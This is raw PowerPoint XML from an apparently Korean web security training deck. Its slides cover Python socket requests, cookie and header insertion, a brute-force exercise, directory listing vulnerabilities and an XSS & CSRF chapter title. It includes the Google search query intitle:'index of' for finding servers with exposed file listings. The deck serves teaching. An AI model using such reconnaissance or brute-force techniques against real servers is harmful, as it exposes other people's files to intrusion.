          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD62CCA2-6028-A340-8F07-0724FB6EC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03" y="4428143"/>
            <a:ext cx="48672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0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Python Socket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88B6E15-AC6C-D648-90FC-0227DA9A1265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="4034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Python Socket – requests</a:t>
            </a:r>
            <a:endParaRPr lang="en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BC1DDF-154F-3B40-A22C-B7C0A56F9728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1670060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Cookie 삽입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17F072-11CD-9C4C-9033-EA04D1705221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3897359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Header 삽입</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F408B8-7EA6-3C47-8B38-FF73F2D5E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28" y="2157518"/>
            <a:ext cx="5038725" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1243CC-1C8F-3B42-BC01-8780B5725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03" y="4292207"/>
            <a:ext cx="49815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8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Brute Force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83E7F0C-3084-6048-B1F1-0F223AC71170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="2604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Brute Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en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D25790-A7B0-D648-BDC9-24C2E7BF2E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726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무차별 대입 공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381628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Directory Listing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83E7F0C-3084-6048-B1F1-0F223AC71170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="2625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Directory Listing</a:t>
            </a:r>
            <a:endParaRPr lang="en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D25790-A7B0-D648-BDC9-24C2E7BF2E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1665103"/>
            <a:ext cx="8446543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KR" dirty="0"/>
              <a:t>잘못된 서버 설정으로 인해 외부에서 서버의 모든 파일 조회가 가능한 취약점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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>검색</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>엔진을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>이용하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>찾기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ex)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intitle:"index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of"</a:t>
            </a:r>
            <a:endParaRPr lang="en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971AD6-2E23-F54F-9712-6289E2D55F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31" t="-362" r="331" b="35573"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260279" y="3085491"/>
            <a:ext cx="5486400" cy="338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67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381316" y="2322415"/>
            <a:ext cx="9429368" cy="1474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Chapter 2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XSS &amp; CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1643657134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10716</TotalTime>
  <Words>1312</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>238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맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>7_Office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손영락</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-28T03:36:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T00:52:27Z</dcterms:modified>
</cp:coreProperties>
</file>